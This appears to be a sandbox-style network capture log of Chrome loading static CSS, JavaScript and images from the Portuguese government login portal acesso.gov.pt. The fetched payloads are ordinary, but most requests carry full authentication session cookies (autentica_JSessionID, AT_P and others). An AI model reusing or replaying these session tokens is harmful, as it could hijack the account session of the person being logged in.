                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
2024-11-14 13:59:53 UTC | 363 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 1347
2024-11-14 13:59:53 UTC | 1347 | IN | Data Ascii: @font-face { font-family: 'sa_custom_caps'; src: url('../fonts/sa_custom_caps.eot?s31xf0'); src: url('../fonts/sa_custom_caps.eot?s31xf0#iefix') format('embedded-opentype'), url('../fonts/sa_custom_caps.ttf?s31xf0') format('truetype'),


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49738 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:52 UTC | 1139 | OUT | GET /autentica_static/css/tabs.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
2024-11-14 13:59:52 UTC | 394 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:01:50 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=48
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 2107


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49740 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:52 UTC | 1145 | OUT | GET /autentica_static/pf/css/pf-main.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
2024-11-14 13:59:52 UTC | 363 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 217455


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49739 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:52 UTC | 1148 | OUT | GET /autentica_static/css/bootstrap.min.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
2024-11-14 13:59:52 UTC | 363 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 117154
                                                                                                                  Data Ascii: ad>tr:first-child>th{border-bottom:0}.panel>.table-bordered>tbody>tr:last-child>td,.panel>.table-bordered>tbody>tr:last-child>th,.panel>.table-bordered>tfoot>tr:last-child>td,.panel>.table-bordered>tfoot>tr:last-child>th,.panel>.table-responsive>.table-bo
                                                                                                                  2024-11-14 13:59:53 UTC2466INData Raw: 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 76 69 73 69 62 6c 65 2d 78 73 2d 69 6e 6c 69 6e 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 76 69 73 69 62 6c 65 2d 78 73 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 7b 2e 76 69 73 69 62 6c 65 2d 73 6d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 74 61 62 6c 65 2e 76 69 73 69 62 6c 65 2d 73 6d 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c
                                                                                                                  Data Ascii: ax-width:767px){.visible-xs-inline{display:inline!important}}@media (max-width:767px){.visible-xs-inline-block{display:inline-block!important}}@media (min-width:768px) and (max-width:991px){.visible-sm{display:block!important}table.visible-sm{display:tabl


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49742 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:52 UTC | 1144 | OUT | GET /autentica_static/pf/css/footer.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
2024-11-14 13:59:52 UTC | 363 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 3511
2024-11-14 13:59:52 UTC | 3511 | IN | Data Ascii: @media print { .main-footer { display: none; }}.main-footer { background: #dbdee0; background: -moz-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%); background: -webkit-gradient(linear, left top, left bottom, color-s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 152.199.21.175 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:53 UTC | 567 | OUT | GET /app/pfstatic_static/js/pf-footer.js HTTP/1.1
                                                                                                                  Host: static.portaldasfinancas.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
2024-11-14 13:59:53 UTC | 439 | IN | HTTP/1.1 200 OK
                                                                                                                  Age: 25
                                                                                                                  Cache-Control: max-age=30
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:53 GMT
                                                                                                                  Expires: Thu, 14 Nov 2024 14:00:23 GMT
                                                                                                                  Last-Modified: Mon, 11 Nov 2024 18:18:44 GMT
                                                                                                                  Server: ECAcc (lhc/792D)
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Cache: HIT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Length: 1525
                                                                                                                  Connection: close
2024-11-14 13:59:53 UTC | 1525 | IN | Data Ascii: window.PF||(PF={}),window.PF.common||(PF.common={footer:'<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49746 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:53 UTC | 1128 | OUT | GET /autentica_static/js/modernizr.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
2024-11-14 13:59:53 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:53 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 5418
2024-11-14 13:59:53 UTC | 5418 | IN | Data Ascii: /* Modernizr 2.8.3 (Custom Build) | MIT & BSD * Build: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes */;window.Modernizr=function(a,b,c){function z(a){i.cssText=a}function A(a,b)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49747 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:53 UTC | 1132 | OUT | GET /autentica_static/js/footer/footer.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
2024-11-14 13:59:54 UTC | 401 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=38
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:53 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 3496
2024-11-14 13:59:54 UTC | 3496 | IN | Data Ascii: window.onload = function() { /** * Preencher footer com a info do RGPD */ var footerElem = document.getElementById("footer-rgpd-content"); if (window.PF && window.PF.common && window.PF.common.footer) { footerEl


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49748 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:54 UTC | 1186 | OUT | GET /autentica_static/img/autenticacaogov.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:54 UTC | 372 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=65
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:54 GMT
                                                                                                                  Age: 299
                                                                                                                  Content-Length: 10264


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  12 | 192.168.2.4 | 49749 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:54 UTC | 1186 | OUT | GET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:54 UTC | 574 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:54 GMT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 622
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: image/png
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Set-Cookie: TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754; Secure; Path=/
                                                                                                                  Vary: Accept-Encoding


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  13 | 192.168.2.4 | 49750 | 152.199.21.175 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:54 UTC | 390 | OUT | GET /app/pfstatic_static/js/pf-footer.js HTTP/1.1
                                                                                                                  Host: static.portaldasfinancas.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-11-14 13:59:54 UTC | 439 | IN | HTTP/1.1 200 OK
                                                                                                                  Age: 26
                                                                                                                  Cache-Control: max-age=30
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:54 GMT
                                                                                                                  Expires: Thu, 14 Nov 2024 14:00:24 GMT
                                                                                                                  Last-Modified: Mon, 11 Nov 2024 18:18:44 GMT
                                                                                                                  Server: ECAcc (lhc/792D)
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Cache: HIT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Length: 1525
                                                                                                                  Connection: close
